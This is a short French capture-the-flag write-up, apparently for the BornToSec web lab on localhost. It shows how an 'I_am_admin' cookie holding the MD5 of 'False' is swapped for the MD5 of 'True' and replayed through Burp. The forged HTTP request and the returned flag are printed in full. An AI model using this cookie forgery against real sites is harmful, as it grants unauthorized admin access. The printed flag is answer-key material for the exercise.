Quand on reqarde les headers http

On voit:
Cookie: I_am_admin=68934a3e9455fa72420237eb05902327

Hummmm sa ressemble a du md5

Bingo : https://www.md5online.org/md5-decrypt.html
Le hash veux dire False

Et si on faisait une quete avec le hash True (b326b5062b2f0e69046810717534cb09)*

On utilise burp et le tour est jouer:

GET /index.php HTTP/1.1
Host: localhost:8042
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8042/
Cookie: I_am_admin=b326b5062b2f0e69046810717534cb09


<script>alert('Good job! Flag : df2eb4ba34ed059a1e3e89ff4dfc13445f104a1a52295214def1c4fb1693a5c3'); </script><!DOCTYPE HTML>
<html>
	<head>
		<title>BornToSec - Web Section</title>....